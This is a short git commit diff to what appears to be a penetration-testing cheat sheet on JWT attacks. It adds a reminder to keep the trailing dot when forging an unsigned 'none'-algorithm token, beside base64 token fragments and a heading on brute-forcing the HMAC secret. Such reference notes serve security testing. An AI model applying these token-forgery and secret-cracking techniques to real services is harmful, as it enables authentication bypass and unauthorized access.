added reminder to JWT None algorithm bypass
This commit is contained in:
parent
9cd859fa25
commit
5f83ee9efd
|
@ -32,6 +32,8 @@ eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk
|
||||||
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
|
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
|
||||||
```
|
```
|
||||||
|
|
||||||
|
__Remember to include the `.` at the end even if there is no signature
|
||||||
|
|
||||||
## Brute Force
|
## Brute Force
|
||||||
```python
|
```python
|
||||||
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
|
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
|
||||||
|
|
Loading…
Reference in New Issue